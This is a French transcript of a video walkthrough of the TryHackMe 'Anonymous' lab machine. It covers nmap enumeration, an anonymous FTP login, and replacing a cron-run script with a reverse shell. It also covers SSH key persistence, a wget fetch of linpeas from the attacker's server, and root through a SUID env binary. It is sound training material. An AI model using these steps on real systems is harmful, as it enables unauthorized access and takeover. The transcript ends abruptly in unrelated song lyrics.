Bonjour et bienvenue à tous dans cette nouvelle vidéo CTF sur la plateforme TryHackMe. J'espère que vous avez passé de bonnes fêtes. Donc on se retrouve pour donc le CTF Anonymous qui est en difficulté médium, donc moyenne. C'est un CTF que j'ai déjà fait il y a un moment, je me rappelle plus du tout, donc bon, c'est comme si je l'avais jamais fait, on va dire. J'ai déjà démarré la machine, comme ça c'est fait. Donc voilà, donc c'est un CTF qui m'a l'air assez guidé. Énumérer la machine, combien de ports sont ouverts, qu'est-ce qui est lancé sur le port 21. Bon, j'imagine, je connais déjà la réponse, je pense, hein. Par défaut c'est censé être le service FTP. Ça c'est censé être le service SMB. Ok, bon, ça a l'air quand même assez guidé, voilà. C'est un CTF en difficulté médium, mais bon, c'est pas non plus, trop compliqué, je pense. Donc, donc j'ai déjà lancé ma machine virtuelle, je me suis déjà connecté au VPN, comme ça c'est fait. Donc voilà, on va direct commencer avec un scan nmap 10.10.141.189. -a, -p, -o, n, nmap results.txt. Donc comme d'hab, hein, on fait un scan nmap agressif. De toute façon, je vous l'ai dit, ça commence souvent par un scan nmap, les CTF que je fais. Les 3 quarts du temps, on commence par un scan nmap. Je vous ferai aussi des vidéos CTF sur Hackthebox, ça va venir bientôt. Parce que j'ai commencé Hackthebox il n'y a pas longtemps en fait. Et donc je verrai quels CTF peuvent être faits en vidéo, parce que je sais qu'on n'a pas le droit de forcément publier ce qu'on veut. Je connais pas trop les règles, mais je me renseignerai, je verrai ce que je peux faire en vidéo. Et vous aurez normalement, si tout va bien, des vidéos CTF sur Hackthebox. Ok, donc on a le port 21 donc pour le service FTP, donc c'est bien ce que je pensais. On peut se connecter si on voit Anonymous FTP login allowed. Donc ça veut dire on peut se connecter sans mot de passe avec le nom d'utilisateur Anonymous. On a le port SSH, enfin le port 22 pardon pour le service SSH qui est ouvert. Donc on a OpenSSH 7.6.1 Ubuntu, ok, donc la machine est sous Ubuntu. Ok, on a donc le port 139 et 445 pour le protocole SMB. Donc on aura sûrement des partages accessibles. On va aller directement jeter un œil sur le port 21. Donc pour ça, je vais faire un clear. Pour ça, on va faire FTP, tout simplement. 10.10.141, oula, 141.189, entrée. Et là, il nous demande donc un nom d'utilisateur. Donc on va mettre Anonymous. Et ensuite, please specify the password. On met aucun mot de passe. Et on est connecté. Donc ça, normalement par défaut c'est désactivé sur les serveurs FTP, mais vous pouvez activer une option justement pour autoriser ce compte là à se connecter sans mot de passe. Alors je sais pas si on a accès à tout, ls. Il y a un dossier script, ok. cd script ls, il y a quoi dedans? Il y a un script clean.sh. Alors vu le nom du script clean.sh, je me demande si c'est pas un script automatisé. Je vais faire get clean. Clean.s, ça marche pas, tab ici. Clean.sh, get removed files.log et get to do.txt. Voilà, je vais faire exit maintenant, clear, ls. Et je vais faire un petit dossier Anonymous. Je vais tout ranger comme il faut dans le bon répertoire. FTP, clean.sh, tout.txt dans le dossier FTP. Voilà, donc si je vais dans le répertoire FTP, maintenant on a nos 3 fichiers. Je vais regarder ce qu'il y a dans todo.txt d'abord. Ok, donc je dois vraiment désactiver le login Anonymous, c'est vraiment pas sécurisé, vous voyez. Cat removed file.log. Nothing to delete. Ah, donc là on a un fichier log qui a l'air d'être généré par justement notre script la clean.sh. Rien à supprimer. Et cat clean.sh. Donc là on a un script automatisé. Alors ce qu'il faudrait voir, vous savez quoi, j'ai une idée, je vais faire un truc. mv removed file.back. Je vais faire ça. Et après je vais me reconnecter en FTP. FTP. Là, FTP. Anonymous. Pas de mot de passe. cd scripts. Et je vais refaire get removed files.log. Je veux juste voir un truc, en fait, je veux voir si le fichier il grandit ou pas à chaque fois. Si je fais ls-la,
Le fichier grandit, vous voyez, la première version du fichier qu'on a téléchargé, elle est plus légère que celle-là. Ça veut dire que le script est utilisé, il est en fonction. Ce script-là est continuellement exécuté. Enfin, il est exécuté de manière répétée, automatiquement. Alors là, j'ai une idée. Ce serait de modifier ce script pour obtenir un reverse shell et le reupload pour écraser celui qui a dans le serveur FTP, si on a le droit. Je sais pas si on a le droit d'écriture, on va voir. Donc ce que je vais faire, c'est que je vais mettre sur écoute sur le port 4242 nc-lnvp 4242. Et donc on va... Je vais faire nano clean.sh. Vous savez quoi, je fais mp. Je vais faire autrement clean.sh. Je vais garder une backup de ce fichier, on sait jamais. Oups, excusez-moi, j'ai fait une erreur. Voilà. Là, je vais faire nano clean.sh #bin/bash pour dire qu'on exécute ce fichier avec bash. Et ensuite, je vais y mettre un reverse shell. Alors, je vais directement utiliser un générateur de reverse shell comme d'habitude. J'utilise celui-là, qui est très pratique. Je vais mettre l'adresse IP 10.14.32.60, je crois que c'est ça. Ouais. J'ai toujours pas changé depuis, j'ai dit que je la changerais, mais j'ai toujours pas fait, c'est pas grave. Le port 4242. Et ensuite, ce reverse shell là, voilà, copier. Je vais mettre ça sur le côté ici. On va coller ça, CTRL S, CTRL X. On va se reconnecter au serveur FTP. En tant qu'Anonymous, sans mot de passe, c'est des scripts. Oui, parce que oui, du coup, on a le droit d'écriture ici. On voit write, c'est écrit ici. J'avais pas vu. J'ai pas fait gaffe. W. Donc on peut écrire sur ce fichier là. Donc là, si je fais put clean.sh, ok, ça a l'air bon. Si je fais ls, voilà, le fichier est beaucoup plus léger. Donc par rapport à avant, donc c'est que c'est bon normalement. Je vais faire exit. Et on va attendre de recevoir un reverse shell. En attendant, on peut répondre aux questions. Énumérer la machine quand les ports sont ouverts. Il y avait 4 ports ouverts. Qu'est-ce qui est lancé sur le port 21, donc le service FTP? Quel service est lancé sur le port 139 et 445, donc le service SMB? Et après, il nous demande quel partage. Il y a un partage sur l'ordinateur de l'utilisateur. Comment est-il appelé? Donc ça, on verra après. Et après, on a le flag user.txt, root.txt. On verra ça après. J'ai un reverse shell, ok. Who am I? Je vais voir who am I, qui je suis. Nameless one, ok. Je vais stabiliser mon shell, Python 3. Déjà, est-ce qu'il y a Python 3? On va voir. Switch. Python 3. On a Python 3, donc je vais m'en servir pour stabiliser mon shell. -c, pty, spawn. Voilà. Ensuite, je vais faire export term égale x term. CTRL Z. Et là, je vais faire sty-echo row fg. Voilà. Et là, j'ai un shell complètement stabilisé. J'ai accès à la commande clear. Voilà, c'est parfait. Je vais faire tout d'abord déjà ls. On a le flag user.txt, on va le récupérer. Copier. Je vais le renseigner ici. Hop, voilà. On a un fichier pix. Il y a des images dedans, ok. J'imagine que c'est ça le partage dont ils doivent parler. On vérifiera après avec un autre outil. On a un fichier sudo as admin successful. Donc on a peut-être des droits sudo. Je vais faire sudo-l. Et il nous faut le mot de passe qu'on n'a pas. Je vais laisser ce reverse shell ouvert quand même. À côté de ça, en attendant, je vais utiliser enum for Linux. Avec l'adresse IP, donc 10.10.141.189. Et comme ça, on va énumérer les partages, les noms d'utilisateurs, les groupes, etc. On a 3 partages, donc le partage IPC $, donc ça c'est normal. Pix, donc ouais, c'est celui qu'on a vu. Et on a un partage print $ pour les imprimantes, ok. Pour des drives, pour les pilotes d'imprimantes, ok. Donc voilà, je me suis connecté en SSH. Comme ça, c'est un peu mieux. J'ai un terminal avec des couleurs et tout. Bon, c'est pas forcément essentiel, mais pour ça, je suis juste allé dans ct.ssh. J'ai créé un dossier .ssh en fait dans le répertoire de Nameless One. Et j'ai créé un fichier authorized keys dans lequel j'ai mis une clé privée. En fait, j'ai généré des clés SSH
et la clé publique, je l'ai mise dans ce fichier là. Et comme ça, sur mon PC à moi, enfin depuis ma machine virtuelle, je me suis connecté avec la clé privée sur ce compte là. Et comme la clé publique correspond, eh ben, j'ai pu me connecter en SSH. Par contre, pour ce qui est de passer en tant que root, j'ai toujours pas d'idée. Vous savez quoi, comme je suis un peu bloqué là, on va utiliser document tools, énumération Linux. On va utiliser linpiz, python 3-m http.server 8080 wget 10.14.32.60.8080 linpiz.sh. Donc je télécharge linpiz sur la machine cible, ok. Et donc je vais le rendre exécutable, plus x linpiz, et je vais l'exécuter. Ah, déjà, ouh, attendez. On fait partie du groupe sudo, ok, et du groupe LXD aussi. Va peut-être falloir s'évader d'un conteneur, je sais pas. Ça c'est la faille PwnKit, mais je vais pas l'utiliser parce que normalement c'est pas ce qui est attendu sur ces machines virtuelles. En fait, cette faille a été découverte après que cette machine virtuelle ait été faite, après que ce CTF ait été fait. Donc c'est pas vraiment de la triche, mais c'est pas du jeu. Voilà, c'est pas. À la base, c'est pas ce qui est attendu de nous dans ce CTF. Parce qu'il y a plein de CTF comme ça où on pourrait juste utiliser cette faille, c'est ultra simple. Hein. Vous prenez l'exploit sur GitHub, vous le compilez, pouf, vous passez route, mais bon, c'est nul. Ah voilà, c'est ça, PwnKit, c'est ce que je vous disais. Bon, après, ça marche pas sur toutes les machines, mais. Ah, là, USR bin inv. On peut peut-être faire quelque chose avec ça. GTFO bins, je vais aller voir ça. J'aurais dû le voir tout à l'heure, mais j'ai pas fait gaffe. Et avec inv, on peut. Bah d'accord, bon, bah, si c'était aussi simple que ça, je vais péter un plomb parce que ça fait un moment que j'ai cherché. Inv /bin /sh. Donc on va essayer ça. Bah, on va faire inv /bin /sh-p. Et on est route. Bon ben voilà. En fait le problème là, c'est, on l'a déjà vu dans un CTF, je sais plus lequel, mais le problème c'est que usr/bin/inv a le SUID actif. On peut l'exécuter, on a le droit d'exécution dessus, sauf que le fichier appartient à root. Et comme je l'avais expliqué, quand un fichier a le SUID actif, en fait ça veut dire qu'on peut exécuter ce fichier avec les droits du propriétaire. Donc comme le fichier appartient à root, on peut l'exécuter en tant que root. Et donc comme grâce à inv on peut exécuter un shell, on peut exécuter donc au final un shell en tant que root avec ça. C'est un problème de configuration fait par quelqu'un. Ça peut arriver, en soi. Donc voilà, on est root. Bon c'était pas si compliqué, j'avais juste pas vu. J'aurais dû le voir tout à l'heure, je l'avais pas vu. Cat root.txt. Et donc on a le flag root. Donc voilà. Bon, des fois, ça peut arriver de bloquer comme ça, donc petite technique de flemmard, vous utilisez linpiz ou des outils comme ça. Donc voilà, c'est terminé ce petit CTF de difficulté médium, c'était plutôt pas mal. Donc qu'est-ce qu'on a fait dans ce CTF? On a fait, comme d'hab, de l'énumération de ports et de services avec Nmap. On a obtenu un reverse shell en se servant d'un script qui était exécuté automatiquement de manière régulière sur le service FTP. Grâce à ça, on a eu un reverse shell et ensuite on a trouvé un fichier dont les permissions étaient mal configurées qui nous a permis d'exécuter un shell en tant que root. Voilà. Donc voilà basiquement tout ce qu'on a fait. Donc c'était pas bien plus dur que des CTF de niveau facile. C'est juste que là j'ai mal observé, on va dire. Je pense. J'ai mal observé, j'aurais dû voir le fichier avec le SUID. J'avais fait la commande en plus, j'avais tapé la commande pour trouver des fichiers avec le SUID. Mais je sais pas pourquoi, ça m'a pas sauté aux yeux. En tout cas, j'espère que ça vous aura plu cette petite vidéo CTF. Il y en a d'autres qui arrivent prochainement, vous inquiétez pas, je vais pas arrêter d'en faire. Je sais plus si je vous l'ai dit, mais j'ai la première vidéo explicative, on va dire, sur
sur un concept des CTF et du pentest, surtout des CTF, hein, plus que du pentest de manière générale, c'est plus précisément pour le CTF. J'ai une vidéo donc explicative sur un thème précis qui arrive. Alors je sais pas quand elle va arriver, mais elle est en préparation là. J'ai enfin commencé, j'ai commencé à préparer un script, etc. À préparer la structure de la vidéo, à savoir de quoi je vais parler, dans quel ordre, qu'est-ce que je vais présenter comme outil. Donc elle est en cours de préparation, j'ai commencé. Ne vous inquiétez pas, hein, ça arrive, je saurais pas vous dire quand, je vais pas vous donner de date parce que j'ai pas prévu de date en fait. Mais de toute façon, vous verrez bien quand elle sortira. Je vais pas vous spoil, hein. Bon, alors ce sera une vidéo, je le reprécise au cas où, hein. Ce sera une vidéo vraiment pour les débutants. Peut-être que vous apprendrez des choses, hein, mais en général, comme je suis débutant moi-même, je fais des vidéos pour les débutants aussi. Donc voilà, n'hésitez pas à vous abonner pour voir les prochaines vidéos qui sortiront, à liker si vous avez aimé la vidéo. Donc n'hésitez pas non plus à donner votre avis en commentaire, hein, si jamais. Donc voilà, moi je vous dis à la prochaine. I'm taking 6 shots, yeah, straight to the face. And I wanna get lost, I'm sick of this place. Don't know how to stop when I'm feeling this way. So I'm